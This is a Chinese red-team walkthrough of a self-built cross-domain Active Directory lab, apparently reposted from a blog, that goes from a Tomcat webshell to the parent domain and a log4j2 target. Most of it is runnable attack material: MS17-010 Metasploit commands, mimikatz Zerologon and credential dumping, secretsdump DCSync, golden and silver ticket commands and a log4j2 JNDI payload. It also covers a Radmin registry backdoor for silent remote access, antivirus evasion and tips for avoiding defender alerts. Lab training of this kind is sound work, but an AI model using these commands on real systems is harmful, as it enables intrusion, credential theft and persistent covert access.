红队内网靶场

news2024/11/27 16:40:11

文章目录

        • 开篇介绍
        • 靶场介绍
        • 靶场下载以及配置
        • Tomcat Get Shell
        • 突破DMZ防火墙
        • 拿下域内成员机器
        • 将内网机器上线到CS
        • 使用Adfind侦察子域信息
        • 控制子域DC
        • Radmin登录子域进行权限维持(白银票据/ACL)
        • 子域bloodhound获取父域信息分析
        • 子域Krbtgt密钥创建跨域金票Dcsync父域
        • PTH父域DC准备打靶
        • log4j2拿下靶标
        • 总结

开篇介绍

大家好这里是虚构之人的红队内网靶场的第一个靶场,笔者发现网上的内网靶场不管是国外的HTB AD 101
系列还是国内的红队内网靶场跟实战的环境下有这较大的差距因此很多同学就算练习完这些靶场也无法对
真实场景下渗透有自己的方法论,往往面试红队的时候缺少完整的渗透过程而很是尴尬,笔者打算开始做飞鸟
红队内网靶场系列,来让各位同学拥有至少是完整的渗透过程经验,这里不仅有完整的靶场也有完整的打法
过程可以学习,后续会陆续推出红队内网靶场以及安全运营相关靶场感兴趣的小伙伴可以关注下。

靶场介绍

这里笔者做的靶场是内网跨域靶场需要各位读者通过Web进行GetShell突破DMZ然后
拿到子域权限跨域到父域拿下父域DC后找到父域下不入域机器Web GetShell靶标文件。
配置要求:
	最低要求是6核心CPU/32G内存整个靶场解压后有130G左右。
主要涉及如下知识点:
	Tomcat 任意文件写入漏洞,log4j2 JNDI注入漏洞,ms17-010,
	NetLogon-1472,Krbtgt跨域金票,白银票据,ACL滥用。
使用的工具如下:
	burpsuite,mimikatz,Cobalt Strike,Metasploit,Impacket,fscan,frp
	JNDI exploit,nmap。
VM网卡配置以及网络规划
Vm网卡:
VMent6	192.168.66.0/255.255.255.0		攻击机/Web IP充当外部网络
VMent7	192.168.77.0/255.255.255.0		Web DMZ
VMent8	172.16.88.0/255.255.255.0		子域
VMent9	10.99.9.0/255.255.255.0			根域
网段:
192.168.66.1/24	充当外部网络
192.168.77.1/24	Web
172.16.88.1/24	子域
10.99.9.1/24	根域
Web DMZ防火墙(pfSense)
	192.168.77.10	WEB DMZ网关
	172.16.88.10	子域网关
Web DMZ机器:
	192.168.77.110/192.168.66.110	Tomcat	
域 DMZ防火墙:
	172.16.88.2		子域网关
	10.99.9.2		根域网关
子域:
	172.16.88.100/10.99.9.88		DC		
	172.16.88.120					FZ_DC		
	172.16.88.121					Win10		
	172.16.88.122					Web发布机	
根域:
	10.99.9.100/172.16.88.10		DC		
	10.99.9.101						FZ_DC
	10.99.9.205						靶标
网络规划图简述:

在这里插入图片描述

靶场下载以及配置

下载:
链接:https://pan.baidu.com/s/1YYj9jmBIuI49QvkFOS9uuQ 
提取码:3606 

在这里插入图片描述
在这里插入图片描述

配置信息:
Vm网卡:
	VMent6	192.168.66.0/255.255.255.0		攻击机/Web IP充当外部网络
	VMent7	192.168.77.0/255.255.255.0		Web DMZ
	VMent8	172.16.88.0/255.255.255.0		子域
	VMent9	10.99.9.0/255.255.255.0			根域
	VMent10 10.99.100.0/255.255.255.0		靶标
网段:
	192.168.66.1/24	充当外部网络
	192.168.77.1/24	Web
	172.16.88.1/24	子域
	10.99.9.1/24	根域
Web DMZ防火墙(pfSense):	1_512MB
	192.168.77.10	WEB DMZ	Web Ip root/pfSense
	172.16.88.10	子域IP		
Web DMZ机器:
	192.168.77.110/192.168.66.110	漏洞机器	Tomcat	
域 DMZ防火墙:
	172.16.88.2
	10.99.9.2	网关Web IP	admin/li.com@Pf
子域:
	172.16.88.100/10.99.9.88		DC		2_2G
	172.16.88.120					FZ_DC		2_2G
	172.16.88.121					Win10		2_2G
	172.16.88.122/Web DMZ网关用于突破隔离		Win7		2_1G
根域:
	10.99.9.100/172.16.88.10		DC		
	10.99.9.101						FZ_DC
	10.99.9.200						Win10
靶标:
	10.99.100.201/10.99.9.210		WIN7 跳板机  双网卡机器
	10.99.100.205					靶标	
根域账户设置:
li.com域管	
	rootLi/Root@Admin123
li.com企业管理员:
	LiRootAll/Root@All.li.com
禁用账户:
	administrator
IT 组
	IT_zhangsan/ZXangSXn@li.comZS
	IT_xiaoming/XMing@li.comXM
入域账户:
	LiRuyu/LRY.li.comlry
办公组(WorkingArea):
	lizong/LZ@10001234
	zhangzong/ZZg@96762
	tiancheng/TCg@88855
	xiaoli/XL@@123XXX
	wangmang/WM@9999
子域账户设置:
tset.li.com子域域管
	caixukun/CXK1234XX@NB
	liangfeifan/LFF55555@NB
tset.li.com入域账户
	test_li_ruyu/RYA@123
test.li.com普通账户组:
	IT组(IT organize):
		wangwu/WWNBNB123@com
		lisi/Ls12345@com
	办公组(WorkingArea):
		zhangna/ZN@test.li.com
		xiaona/XX@test.li.com
		feifange/Ffg666@com
		meilinna/MA@test.li.com
		shifenzhe/SFZ.test.li.com
禁用账号:
	administrator

Tomcat Get Shell

攻击机(linux)192.168.66.130
攻击机(windows)192.168.66.129
这里笔者的环境是两台电脑配置VMent6网卡充当外部网络,有能力的小伙伴也可以直接自己
搭建到真实的外部网络上,这个靶场内默认的登录账户是admin/admin小伙伴们也可以自行设置。
首先是进行信息收集目前只是指定192.168.66.110这个IP,下面开始进行信息收集。
使用nmap扫描发现开放了80/3389/445/135等端口,发现80端口是Tomcat服务

在这里插入图片描述

尝试使用Tomcat任意文件上传漏洞看看能不能拿到WebShell。

在这里插入图片描述

写入哥斯拉WebShell。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用CS Powershell一句话上线到CS进行操作。

在这里插入图片描述
在这里插入图片描述

这里CS使用的是LSTAR插件下载地址:https://github.com/lintstar/LSTAR

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

这里我上传了fscan对192.168.77.10进行扫描,因为目标存在360因此需要对fscan进行免杀,我的做法是使用我之前
写的PengCode安全工具将fscan转换为ShellCode将其加密后放入ATL框架中的函数内,因为是函数内的BYTE数组所以
没有编译在data节中编译器将压入栈中因此更加隐蔽,对免杀和逆向感兴趣的小伙伴可以给我留下言人多的话我会专门
出系列文章。
fscan扫描命令这里跳过了存活和web poc:
fscan.exe -h 192.168.77.10 -np -no -nopoc

在这里插入图片描述

发现了WebTitle信息是pfSense防火墙的登录,下面使用frp做隧道代理看看能不能拿下防火墙。
下面是frpc配置提前配置了多级代理用于穿透内网:

在这里插入图片描述

frps这里我是部署在Tomcat上的没有部署在公网VPS上如果是真实环境的话需要一台公网VPS部署,不建议
直接部署在Tomcat的WebShell机器上,因为你不确定正向连接端口是否会放开。

在这里插入图片描述
在这里插入图片描述

突破DMZ防火墙

上面通过frp代理成功访问到pfsense防火墙,pfsense防火墙是有漏洞可以打的,pfsense是属于软件防火墙
是可以进行配置修改绕过使得WebShell机器可以突破DMZ的,如果遇到的是网闸这种硬件型的那就比较难搞,
记住一句话没有绝对安全系统,一定存在一个路径是可以拿到靶标的只是你现在还不知道嘿嘿嘿奥里给干了兄弟们。	
这里咱们直接尝试pfsense防火墙的默认账户密码"admin/pfsense".

在这里插入图片描述

登录成功之后咱们看一下接口对网络架构有个基本的了解。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到有192段和172段两个接口,也就是说咱们的Tomcat服务器是可以访问172段的但是设置了DMZ规则导致不能
访问172段,现在咱们看一下规则配置是不是这样。	

在这里插入图片描述
在这里插入图片描述

可以看到规则就是Tomcat的192段属于DMZ不能主动访问172段而172段可以访问192段,咱们把DMZ规则下掉然后
扫描172.16.88.1/24看看会有什么发现。

在这里插入图片描述
在这里插入图片描述

拿下域内成员机器

Tomcat通过之前的nmap扫描发现是开放了3389端口,这里为了方便使用mimiktaz抓取本机账户密码登录3389,
如果是是实际场景的话该操作可能会触发登录告警因此不推荐这种方式可以使用todesk或者其他远控进行登录。

在这里插入图片描述

登录成功发现确实是360直接退掉杀软。

在这里插入图片描述

使用fscan扫描172.16.88.1/24,如果是真实场景的红蓝对抗中不建议使用fscan进行大规模扫描因为会打出成吨的告警,
很容易被防守方发现尽量还是要用常规的方式进行横向比如SSH/浏览器账户密码等

在这里插入图片描述

使用msf尝试ms17-010攻击命令:
	setg Proxies socks5:192.168.66.110:8055
	setg ReverseAllowProxy true
	use exploit/windows/smb/ms17_010_eternalblue
	set payload windows/x64/meterpreter/bind_tcp
	set rhost 172.16.88.122
	run	

在这里插入图片描述

进入shell meterpreter > shell,发现目标机器在域内,看起来是在子域test.li.com

在这里插入图片描述

查询域信任关系:nltest.exe /domain_trusts

在这里插入图片描述

可以看到test.li.com的父域是li.com且没有其他子域信息,下面查询下域控DC。
net group "Domain Controllers" /domain

在这里插入图片描述

查询域管:net group "domain admins" /domain

在这里插入图片描述

查询是否存在域管进程:tasklist /v	

在这里插入图片描述

看起来似乎没有域管进程,ms17-010的shell是System权限可以注入到域管进程进行Dcsync操作。

将内网机器上线到CS

通过ms17-010打下了一台域内机器,现在使用CS的Pivoting下Listener来生成上线Beacon,
需要注意的是Tomcat是双网卡机器所以Listen Host要填写为内网IP默认双网卡机器CS的
是上线IP也就是外网Ip稍微注意下就行。

在这里插入图片描述

meterpreter	upload上传Beacon文件

在这里插入图片描述

上传成功进入shell上线Beacon文件。

在这里插入图片描述

使用Adfind侦察子域信息

咱们成功上线到了CS先看下有没有杀软:
wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName,productState,pathToSignedProductExe | findstr /V /B /C:displayName || echo No Antivirus installed
发现没有杀软直接使用mimikatz抓下ntlm hash。
	[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
	[+] host called home, sent: 787066 bytes
	[+] received output:
	
	Authentication Id : 0 ; 997 (00000000:000003e5)
	Session           : Service from 0
	User Name         : LOCAL SERVICE
	Domain            : NT AUTHORITY
	Logon Server      : (null)
	Logon Time        : 2023/4/10 23:37:43
	SID               : S-1-5-19
		msv :	
		tspkg :	
		wdigest :	
		 * Username : (null)
		 * Domain   : (null)
		 * Password : (null)
		kerberos :	
		 * Username : (null)
		 * Domain   : (null)
		 * Password : (null)
		ssp :	
		credman :	
	
	Authentication Id : 0 ; 996 (00000000:000003e4)
	Session           : Service from 0
	User Name         : WIN7-TEST-LI$
	Domain            : TEST
	Logon Server      : (null)
	Logon Time        : 2023/4/10 23:37:43
	SID               : S-1-5-20
		msv :	
		 [00000003] Primary
		 * Username : WIN7-TEST-LI$
		 * Domain   : TEST
		 * NTLM     : 689828102235cee6f7480323ede6811c
		 * SHA1     : 4aeae8aee6f5cd3e21759027321071930b539e70
		tspkg :	
		wdigest :	
		 * Username : WIN7-TEST-LI$
		 * Domain   : TEST
		 * Password : <r'gawWqKlXM8_/HsF"t%-le!Yvv%U<*5g^sKo?=Ev-@0j=\+D=im63(J8qoTmDU/yyU=qX5<qIQcy0XplkIM\M@:&7uu>9*O^5!- :"iGfl<>gbG`5Q$"h9
		kerberos :	
		 * Username : win7-test-li$
		 * Domain   : TEST.LI.COM
		 * Password : <r'gawWqKlXM8_/HsF"t%-le!Yvv%U<*5g^sKo?=Ev-@0j=\+D=im63(J8qoTmDU/yyU=qX5<qIQcy0XplkIM\M@:&7uu>9*O^5!- :"iGfl<>gbG`5Q$"h9
		ssp :	
		credman :	
	
	Authentication Id : 0 ; 47238 (00000000:0000b886)
	Session           : UndefinedLogonType from 0
	User Name         : (null)
	Domain            : (null)
	Logon Server      : (null)
	Logon Time        : 2023/4/10 23:37:43
	SID               : 
		msv :	
		 [00000003] Primary
		 * Username : WIN7-TEST-LI$
		 * Domain   : TEST
		 * NTLM     : 689828102235cee6f7480323ede6811c
		 * SHA1     : 4aeae8aee6f5cd3e21759027321071930b539e70
		tspkg :	
		wdigest :	
		kerberos :	
		ssp :	
		credman :	
	
	Authentication Id : 0 ; 999 (00000000:000003e7)
	Session           : UndefinedLogonType from 0
	User Name         : WIN7-TEST-LI$
	Domain            : TEST
	Logon Server      : (null)
	Logon Time        : 2023/4/10 23:37:43
	SID               : S-1-5-18
		msv :	
		tspkg :	
		wdigest :	
		 * Username : WIN7-TEST-LI$
		 * Domain   : TEST
		 * Password : <r'gawWqKlXM8_/HsF"t%-le!Yvv%U<*5g^sKo?=Ev-@0j=\+D=im63(J8qoTmDU/yyU=qX5<qIQcy0XplkIM\M@:&7uu>9*O^5!- :"iGfl<>gbG`5Q$"h9
		kerberos :	
		 * Username : win7-test-li$
		 * Domain   : TEST.LI.COM
		 * Password : <r'gawWqKlXM8_/HsF"t%-le!Yvv%U<*5g^sKo?=Ev-@0j=\+D=im63(J8qoTmDU/yyU=qX5<qIQcy0XplkIM\M@:&7uu>9*O^5!- :"iGfl<>gbG`5Q$"h9
		ssp :	
		credman :
可以看到没有抓到域用户账户只抓到自身的机器账户,使用CS查看进程也没有发现域账户进程下面使用Adfind侦察下域信息。
先用Adfind查询下域信任关系因为当前没有域账户需要用机器账户查询ms17-010正好是System权限可以使用机器账户查询
ldap信息,如果是本地管理员的话是无法查询需要提权到System权限。
Adfind.exe -f objectclass=trusteddomain -dn

在这里插入图片描述

可以看到父域是li.com只有一个子域,这里在查询下域内机器信息。
Adfind.exe -schema -s base objectversion

在这里插入图片描述

可以看到子域有两台2016一台WIN7一台WIN10,2016就是之前查询到的域控机器。
因为当前只拿到了WIN7的机器账户查询下WIN7机器账户的委派看看有没有可以利用的。
Adfind查询机器账户非约束委派:
	Adfind.exe -b "DC=test,DC=li,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

在这里插入图片描述

Adfind查询机器账户约束委派:
	Adfind.exe -b "DC=test,DC=li,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

在这里插入图片描述

Adfind查询机器账户基于资源约束委派:	
	Adfind.exe -b "DC=test,DC=li,DC=com" -f  "(&(samAccountType=805306369)(msDS-AllowedToAct OnBehalfOfotherIdentity=*))" msDS-AllowedToActOnBehalfOfOtherIdentity

在这里插入图片描述

Adfind查询服务账户基于资源约束委派:	
	Adfind.exe -b "DC=test,DC=li,DC=com" -f  "(&(samAccountType=805306368)(msDS-AllowedToAct OnBehalfOfotherIdentity=*))" msDS-AllowedToActOnBehalfOfOtherIdentity

在这里插入图片描述

查询下SPN看看有啥有价值的没。

在这里插入图片描述

上面查询委派发现并咱们现在控制的机器账户并没有设置委派,现在有两个思路一个打印机委派打法一个是域
CVE打法,第一种是打印机bug+NtlmRelay+基于资源约束委派,将辅助DC的Ldap进行Relay到主DC修改辅助DC的
msDS-AllowedToActOnBehalfOfOtherIdentity属性的SID为WIN7机器账户进行请求辅助DC的cifs的TGS票据登录
辅助DC控制子域,第二种是利用各种域内CVE如1472/4482/Windows Print Spooler/等漏洞进行攻击DC,这里我才使
用第二种打法直接试下1472(不是我懒-。-)。

控制子域DC

现在目前掌握的域内权限只有一台WIN7的机器账户,根据上面的分析现在采用第二种打法直接尝试重置DC
机器账户为空看看能否成功后进行Dcsync控制子域。
mimikatz使用Zerologon:
target:域控IP
account:域控机器账号
lsadump::zerologon /target:172.16.88.120 /account:2016-TEST-LI-DC$ /poc

在这里插入图片描述

下面进行利用,需要注意的是向Zerologon这种NetlogonRPC算法漏洞会导致大量的请求安全设备会直接告警,
因此在决定使用此类以及被安全产品写规则的漏洞后要尽快横向到靶标并设置域权限维持。
lsadump::zerologon /target:172.16.88.120 /account:2016-TEST-LI-DC$ /exploit

在这里插入图片描述

因为默认域控机器账户具有Dcsync功能,这里直接重置为空了咱们直接进行Dcsync控制子域这里我直接上frp开启了二级代理,
方便我后续使用kali进行PTH操作,下面将frpc与frps上传到WIN7跳板机上开启下面是frpc与frps配置,上传frps是因为可能
出现三级代理的情况所以就直接上传了。
frpc.ini:
	[common]
	server_addr = 192.168.77.110
	server_port = 7000
	
	[socks5_172Socket]
	type = tcp
	plugin = socks5
	remote_port = 9999		
	
	[socks5_172_DC_0]
	type = tcp
	local_ip = 127.0.0.1
	local_port = 9001
	remote_port = 1234
fprs.ini:
	[common]
	bind_port = 7000
使用Impacket下的secretsdump.py进行Dcsync操作。
python3 secretsdump.py '2016-TEST-LI-DC$@172.16.88.120' -no-pass

在这里插入图片描述

使用wmiexec和smbclient获取shell以及上传CS Beacon文件上线到CS。
proxychains python3 wmiexec.py administrator@172.16.88.120 -hashes 0:28168fb732f0fc371715a20026d83793

在这里插入图片描述
在这里插入图片描述

使用CS配置Privoting->Listener需要注意不要配置错IP.

在这里插入图片描述
在这里插入图片描述

使用wmiexec执行上线成功这里发现了个小意外172.16.88.120是辅助DC但是之前设置的是DC名称,主DC是
172.16.88.100,上线到CS的时候才发现的不知道各位小伙伴们发现了没有。

在这里插入图片描述

Radmin登录子域进行权限维持(白银票据/ACL)

在实战中为了防止被防守方发现后踢出权限可以做权限维持,域权限的维持这里我选择使用白银票据和WriteDACL
来做域权限维持,可以制作两台DC的cifs服务TGS白银票据来控制DC,在给一个低下权限账户或者自己创建一个低权限
账户配置一个对域的WriteDACL的权限,就算DC自身的服务账户都改了的情况下也能通过低权限账户的WriteDACL赋予
Dcsync权限重新制作白银票据来控制DC,当然你使用黄金票据来做域权限维持也是可以的,但是黄金票据申请TGT的时候
会在KDC留下日志如果防守方设备监控了KDC日志那么就有可能被溯源,但是白银票据只会在终端下留下日志因此也可以
制作除DC之外的白银票据之后进行PTT利用重新获取目标机器控制权,当然也有更隐秘的手段比如修改域控机器账户属性
做委派的域权限维持也是可以的,大家玩靶场的时候可以自行去做,这里为了添加修改权限ACE方便我直接使用Radmin登录
了,如果是实战的话小伙伴也可以用powerview+Rights-GUID的方式添加ACE。
这里我讲下为什么用Radmin登录,首先操作比较方便类似于像是3389那种方式直接登录而且可以自定义账户密码,第二
如果有安全产品的ACL规则开启RDP访问或者访问3389啥的可能会告警也可能直接防火墙屏蔽了3389啥的当然你可以本地
端口转发到其他端口也是可以的,如果在原本开放3389的情况下,你RDP上去可能会把别人挤掉会察觉也很危险的操作,
这里我主要还是方便,下面我给大家简单讲讲怎么使用Radmin吧。
下载:
https://www.radmin.com/download/

在这里插入图片描述

下载完成后的压缩包解压有两个文件如下:	

在这里插入图片描述

上传成功之后大家可以用我的reg注册表文件注册这样被控端默认密码就是 SuShui/XuGouZhiRen
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server]
@=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server\Parameters\NtUsers]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server\Parameters\Radmin Security]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server\Parameters\Radmin Security\1]
"1"=hex:10,00,00,0c,53,00,75,00,53,00,68,00,75,00,69,00,30,00,01,00,98,47,fc,\
  7e,0f,89,1d,fd,5d,02,f1,9d,58,7d,8f,77,ae,c0,b9,80,d4,30,4b,01,13,b4,06,f2,\
  3e,2c,ec,58,ca,fc,a0,4a,53,e3,6f,b6,8e,0c,3b,ff,92,cf,33,57,86,b0,db,e6,0d,\
  fe,41,78,ef,2f,cd,2a,4d,d0,99,47,ff,d8,df,96,fd,0f,9e,29,81,a3,2d,a9,55,03,\
  34,2e,ca,9f,08,06,2c,bd,d4,ac,2d,7c,df,81,0d,b4,db,96,db,70,10,22,66,26,1c,\
  d3,f8,bd,d5,6a,10,2f,c6,ce,ed,bb,a5,ea,e9,9e,61,27,bd,d9,52,f7,a0,d1,8a,79,\
  02,1c,88,1a,e6,3e,c4,b3,59,03,87,f5,48,59,8f,2c,b8,f9,0d,ea,36,fc,4f,80,c5,\
  47,3f,db,6b,0c,6b,db,0f,db,af,46,01,f5,60,dd,14,91,67,ea,12,5d,b8,ad,34,fd,\
  0f,d4,53,50,de,c7,2c,fb,3b,52,8b,a2,33,2d,60,91,ac,ea,89,df,d0,6c,9c,4d,18,\
  f6,97,24,5b,d2,ac,92,78,b9,2b,fe,7d,ba,fa,a0,c4,3b,40,a7,1f,19,30,eb,c4,fd,\
  24,c9,e5,a2,e5,a4,cc,f5,d7,f5,15,44,d7,0b,2b,ca,4a,f5,b8,d3,7b,37,9f,d7,74,\
  0a,68,2f,40,00,00,01,05,50,00,00,20,b3,3b,b8,42,13,f4,d7,a8,9e,19,b5,e3,c5,\
  57,9a,12,4e,6c,b0,8e,13,12,12,e2,e8,96,37,a4,65,a0,5a,07,60,00,01,00,7d,4a,\
  01,ba,15,d5,27,a3,aa,8d,ca,f1,f9,f7,b0,c5,e7,79,47,c3,3a,26,28,33,47,7d,d9,\
  7c,28,77,b8,ac,c5,5f,23,cd,90,a2,94,37,f8,64,f5,0c,08,f4,9e,ae,1c,b7,c5,c7,\
  ea,7a,09,6b,c9,c7,c6,43,d1,0d,bc,d4,d0,02,c8,71,bc,f1,e5,c7,f7,3d,1e,fa,cf,\
  6b,dd,c8,3f,7f,0e,56,7f,45,9a,51,a9,d6,23,43,c6,fd,1d,c8,70,8c,0a,f4,da,6b,\
  b6,87,d0,35,82,cf,21,55,76,f4,95,69,df,9d,b8,0c,92,fc,c1,e6,c9,3b,8e,5d,30,\
  6c,90,55,55,85,cb,69,17,14,76,2e,31,73,18,38,3a,0f,77,68,9b,a2,d3,7e,02,2a,\
  9d,8e,5e,1b,41,0b,36,6d,9e,9d,da,cc,fc,79,19,3e,4c,7e,60,67,56,67,22,6f,3b,\
  c8,cf,c6,38,2b,34,fb,bf,3e,97,92,a8,b8,b4,e1,92,92,6e,01,b0,2e,97,b5,16,ff,\
  60,e1,e6,73,9d,72,d7,34,a2,48,93,55,35,f0,fe,71,c4,66,c3,a0,7a,6e,9a,7d,08,\
  a8,b1,0f,c9,6b,ba,76,74,d3,31,b4,90,00,9d,48,60,61,46,60,17,9f,3a,e5,9e,cc,\
  40,ec,72,eb,20,00,00,04,ff,01,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Shared]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Shared\Parameters]
@=""
"AutoSelectLangId"=hex:01,00,00,00
"LangId"=hex:00,00,00,00

保存为xxx.reg之后上传到被控端执行如下命令添加该注册表文件:
方式1
regedit /s xxx.reg
方式2(CS)
shell C:\Windows\SysWOW64\regedit.exe /s C:\Users\Public\222.reg
这样被控端的账户密码就是SuShui/XuGouZhiRen
大家也可以直接导出

在这里插入图片描述
在这里插入图片描述

需要注意要用System权限进行安装,用户权限静默可能安装失败。

在这里插入图片描述

这里咱们之前Dcsync的时候以及拿到机器账户Hash,所以可以直接制作白银票据下面是命令需要的时候可以做下进行PTT。
2016-TEST-LI-DC$	31d6cfe0d16ae931b73c59d7e0c089c0
2016-TEST-LI-FZ$	67a2b758f11b8e19609405d3eb1f5eee
python3 ticketer.py -domain-sid S-1-5-21-1554304197-1510085637-3326330895 -nthash 31d6cfe0d16ae931b73c59d7e0c089c0 -spn cifs/2016-TEST-LI-DC.test.li.com -domain test.li.com administrator
下面给lisi普通域账户做下WriteDACL的ACL后门。

在这里插入图片描述

子域bloodhound获取父域信息分析

现在对根域的域情况不是很清楚下面要进行信息收集使用bloodhound分析根域后进行跨域攻击。
SharpHound.exe -d li.com

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

子域Krbtgt密钥创建跨域金票Dcsync父域

上面咱们拿到了子域DC控制权正常攻防来说都是要进步信息收集找到靶标的,但是这里因为靶场是我搭建的所以我就知道
靶标是在父域下面其实这里咱们是可以访问父域资源的我这里还是跨域攻击然后在横向到靶标这种方式来(不是刷路径分-.-),
当然小伙伴们也可以根据自己的打法来玩。
Krbtgt跨域金票需要关闭SID过滤的情况下才行当然默认只有林中才会开启SID过滤。
利用步骤:
1.使用mimikatz伪造新PAC为根域的Enterprise Admins(企业管理员组),并创建跨域黄金票据。
2.将创建好的跨域票据进行Dcsync或者,PTT(传递票据)申请根域cifs服务的TGS票据。
利用步骤1:
使用Adfind查询下企业管理员组SID:
Adfind.exe -b "CN=Enterprise Admins,CN=Users,DC=li,DC=com" objectSid

在这里插入图片描述

mimikatz创建跨域金票:
清除当前票据
	kerberos::purge
注入跨域金票参数说明:
	sids:Enterprise Admins(企业管理员组)SID
sid:当前域SID
	domain:当前域名
	krbtgt:NTLM Hash
ptt:将票据注入当前内存
	kerberos::golden /user:administrator /sids:S-1-5-21-1219037115-404033701-4288556313-519 /sid:S-1-5-21-1554304197-1510085637-3326330895 /domain:test.li.com /krbtgt:91a07429bd05b231d1d19392bdf7a7a3 /ptt

在这里插入图片描述
在这里插入图片描述

当然跨域攻击的方式有很多比如在可以访问父域的情况下你直接打Zerologon重置父域DC机器账户密码为空,或者
打印机BUG/PetitPotam+非约束委派进行跨域攻击也可以,因为域控默认就具有非约束为委派,或者使用域间信任
密钥进行跨域利用均可,具体是使用那种方式需要根据实战场景来做的。

PTH父域DC准备打靶

这里也为后续能够访问靶标做准备,咱们用frp做下3级代理上线到CS。

在这里插入图片描述
在这里插入图片描述

wmiexec登录到父域DC后上传fscan找找靶标进行信息收集。

在这里插入图片描述
在这里插入图片描述

这里看下10.99.9.205是不是咱们要找的靶标

在这里插入图片描述

log4j2拿下靶标

相信大家很眼熟是vulfcous下的log4j2靶场这就是咱们的靶标拿下这个的shell就是拿到靶标了,
废话不多说直接上开打。
JNDI利用工具下载:
https://github.com/Jeromeyoung/JNDIExploit-1
已经编译好的jar文件:
https://github.com/Mr-xn/JNDIExploit-1
支持的格式查看:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
这里父域没有java环境咱们将java-jre-8u172上传一个用/s做静默安装,我这里使用smbclient.py传输的
能快一些,如果使用CS上传非常慢,这也是在实战中很头疼的问题那就是装环境哈哈。

在这里插入图片描述

这里有点乱码可以在wmiexec加上-codec gbk解决乱码。
JNDI利用exp:
${jndi:ldap://10.99.9.101:7777/TomcatBypass/TomcatEcho}
成功拿到靶标:

在这里插入图片描述

总结

本靶场是红队内网跨域靶场第一弹下面几个跨域靶场会陆续加上vCenter/Kubernetes/gitlab/ADCS/exchange/等常见系统,
也会陆续做安全运营相关靶场从防守方视角反推红队攻击路径逆向分析木马IoC排查终端木马编写相关报告,如果大家对靶场
系列感兴趣的话欢迎关注。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/423561.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Activity启动模式

Activity的启动模式 首先activity启动之后是放在任务栈中的&#xff0c;task stack&#xff0c;既然是栈&#xff0c;遵循先进后出原则。有玩家比喻oncreate是入栈&#xff0c;onDestroy是出栈。 同一个APP中&#xff0c;不同的activity可以设置为不同的启动模式。在manifest…

【深一点学习】我用CPU也能跟着沐神实现单发多框检测(SSD),从底层了解目标检测任务的实现过程,需要什么样的方法调用。《动手学深度学习》Yes,沐神,Yes

目标检测近年来已经取得了很重要的进展&#xff0c;主流的算法主要分为两个类型[1611.06612] RefineNet: Multi-Path Refinement Networks for High-Resolution Semantic Segmentation (arxiv.org)&#xff1a;&#xff08;1&#xff09;two-stage方法&#xff0c;如R-CNN系算法…

centos7.2-rh7.2安装docker的问题

目录1. 环境2. 问题排查2.1 failed to start daemon: error initializing graphdriver: overlay2: the backing xfs filesystem2.2 centos7.2内核bridge.ko问题2.3 kernel:unregister_netdevice: waiting for ... to become free. Usage count 12.4 离线安装依赖问题1. 环境 …

AC7811—FOC无感控制代码调试与测试

目录 滑膜观测器调试 开环调试 闭环调试 IF VF DIRECT IF VF DIRECT 磁链观测器 一次/两次预定位 脉冲注入 高频注入 直线or五段曲线 滑膜观测器调试 开环调试 PWM0 两通道接示波器后&#xff0c;屏幕上打印的是开环给定同步转速积分电角度和滑模观测器估计转子电…

【C++】从string开始了解STL

文章目录1.初识STL1.什么是STL2.STL的版本3.STL的六大组件2.string1.string类模板2.string类的构造函数3.string内部数据访问4.string的遍历5.string类的迭代器6.string的Capacity相关接口7.string的修改相关接口8.其他接口1.初识STL 1.什么是STL STL(standard template liba…

Kotlin在Android开发中的应用与实践

Kotlin在Android开发中的应用与实践 通过本篇文章你将了解到下面内容&#xff1a; 介绍Kotlin语言&#xff1a;简述Kotlin语言的背景、特点和优势&#xff0c;为什么Kotlin在Android开发中变得越来越流行。 Kotlin与Java的对比&#xff1a;对比Kotlin和Java在语法、编程范式、…

规模化敏捷框架:Scrum@Scale

Scrum 敏捷方法有助于团队成员之间更有效地合作&#xff0c;实现共同的业务目标。但是当一个组织想要扩展 Scrum 方法到更多的团队时&#xff0c;应该如何实施&#xff1f;Scrum 仅为单团队开发、交付和运维产品提供了一个框架&#xff0c;而 ScrumScale&#xff08;SS&#xf…

多模态 AI 开发者召集令|4月22日@深圳,等你参加!

四月春暖花开&#xff0c;Jina AI 联合好朋友 OpenMMLab 一起&#xff0c;共同举办第八期「中文社区面对面」活动&#xff0c;将于 4 月 22 日&#xff08;周六&#xff09;下午在 Alpha Bay 深圳智汇港湾孵化器举行。本活动也得到了亚马逊云科技 User Group深圳、Xtreme1 的大…

C++ std::cin

C std::cin相关概念使用1. 一个常见的使用场景&#xff1a;2. 用于静态对象的构造和析构函数中&#xff0c;访问标准输入/输出流是安全的。3. 作为 *while* 语句的条件4. 配合 *get*、*getline* 使用相关概念 istream 一个class&#xff0c;提供输入操作。cin 一个 istream 对…

javaweb游戏代练网站设计与实现

